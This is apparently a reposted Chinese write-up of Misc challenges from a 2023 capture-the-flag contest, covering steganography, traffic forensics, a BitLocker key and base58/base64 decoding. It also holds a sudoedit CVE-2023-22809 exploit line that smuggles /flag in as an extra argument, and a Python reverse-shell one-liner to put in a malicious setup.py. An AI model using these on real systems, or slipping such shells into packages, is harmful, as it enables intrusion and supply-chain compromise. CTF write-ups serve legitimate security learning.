sudo
CVE-2023-22809
没有vim vi,就用原生编辑器nano
EDITOR='nano -- /flag' sudoedit /etc/GAMELAB
piphack
可以下载任意包,考虑构造恶意的包,让他去下载
直接在setup下写反弹shell
import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx',8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
给目录tar一下
tar -czvf file.tar.gz evalp/
wordle
猜单词
盲人隐藏了起来
补文件头得压缩包密码
图片尾部有个key
Keyischunqiu123
*Crypto Tips/Tools – AACC CYBER COMPETITION PRACTICE
搜索到Steg的tools
happy2forensics
提示:捕获源端口为20,目的端口为80的TCP流量,可以获得bitlocker密码
tcp.port == 20 &&tcp.dstport==80
找到密钥
bitlocker:120483-350966-299189-055297-225478-133463-431684-359403
大文件压缩包 导出看看
刚才的密钥恢复挂载
脚本合成图片
除了图片外还有两个异常文件
foremost分离210-1.png文件,得到一张jpg和很多png文件,发现jpg文件有两个jpg头,删掉前面一个jpg头得到第一个flag
用脚本或者工具拼接分离的很多png文件,得到一串password
用DiskGenius文件挂载找到可疑压缩包,得到flag2.txt
用得到的password去解压缩包得到flag2
58与64
文档内的先base58解密,在拼接解密base64
base58_chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
base58_vals = {c: v for v, c in enumerate(base58_chars)}
def decode_base58(enc):
num = 0
for c in enc:
num *= 58
num += base58_vals[c]
return num.to_bytes((num.bit_length() + 7) // 8, 'big')
for i in range(14268):
with open(f"./tmp_dc7fe258d0d39f50f605eb64cc8189eb-1/{i}.txt", "r") as f:
data = f.read().splitlines()
dec = decode_base58(data[0])
print(dec)
with open('flag.txt',"a") as f:
f.write(dec.decode())
import base64
with open('flag.txt', 'r') as f:
data = f.read()
def decode(data):
try:
dec = base64.b64decode(data)
print(f'解密后:{dec}')
decode(dec)
except Exception:
pass
decode(data)
文章来源地址https://www.toymoban.com/news/detail-650558.html文章来源:https://www.toymoban.com/news/detail-650558.html
到了这里,关于2023年春秋杯网络安全联赛春季赛Misc-AK的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!